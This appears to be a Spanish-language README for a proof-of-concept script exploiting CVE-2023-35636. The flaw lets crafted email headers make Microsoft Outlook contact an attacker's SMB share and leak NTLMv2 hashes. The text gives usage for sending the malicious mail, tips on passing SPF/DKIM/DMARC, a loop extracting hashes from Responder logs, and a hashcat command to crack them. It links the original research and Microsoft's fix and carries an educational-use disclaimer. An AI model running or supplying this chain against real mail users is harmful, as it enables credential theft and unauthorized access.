
Vulnerabilidad de divulgación de información de Microsoft Outlook (filtración de hash de contraseña) - Expect Script POC
Vulnerabilidad de divulgación de información de Microsoft Outlook (filtración de hash de contraseña) - Script POC en Expect
CVE-2023-35636 es un exploit de la función de compartir calendario en Microsoft Outlook, mediante el cual agregar dos encabezados a un correo electrónico dirige a Outlook a compartir contenido y contactar a una máquina designada, creando una oportunidad para interceptar un hash NTLM v2.

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (no olvides todas las \)

notas: chmod +x cve-2023-35636.sh requiere la aplicación expect requiere un remitente IP legítimo y un remitente de correo electrónico (para pasar SPF, DKIM, DMARC)


for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
Créditos: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
Solución alternativa/Corrección: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636
más sobre mí ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Aviso legal: IMPORTANTE: Este script se proporciona SOLO para fines educativos, pruebas éticas y uso legal. No lo use en ningún sistema o red sin permiso explícito. El acceso no autorizado a sistemas informáticos y redes es ilegal, y los usuarios que realicen actividades no autorizadas están sujetos a acciones legales. El autor NO es responsable de ningún daño causado por el mal uso de este script.